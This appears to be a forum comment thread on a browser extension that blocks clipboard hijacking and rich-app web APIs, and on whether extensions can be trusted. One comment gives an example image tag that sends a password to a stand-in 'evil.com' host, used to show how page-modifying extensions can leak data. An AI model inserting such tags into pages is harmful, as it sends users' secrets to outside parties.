I was hoping this would also prevent websites from messing with the input to the clipboard. It's a bit annoying to copy a sentence from a website only to have "Read more on XYZ!" appended to it.
I'd actually like an extension along the lines of "This is not Google Docs, for fuck's sake", that just disables all these APIs that are only ever useful with rich apps, but not with content-heavy websites, for example:
- copy/paste hijacking
- sensor access: microphone, camera, GPS, etc.
Maybe even go further and introduce some sort of rate-limiting for
Incidentally, what are these APIs? I am building a rich content app (SVG editor) and have been starting to think about what copy + paste will look like.
Even if the plugin couldn't phone home directly, if they have the power to change the HTML of the page, they can insert <img src="http://evil.com/phonehome?yourpassword=whatever"> and phone home that way. There's no permission that lets a plugin modify pages while preventing it from inserting tags that cause new requests.
The plugin's code is probably quite short - maybe you could inspect it yourself, manually?
Problem is extensions silently update in the background. They are frequently sold to adware companies, then malicious scripts added in without the user's knowledge.
Hadn't done this before, but it's trivial to manually load the plugin[1] from the cloned git repo[2].
It's a bit disappointing that Chrome doesn't let you sandbox things well enough to install plugins safely; there's no reason that plugins should be allowed to transmit data without asking for permission.
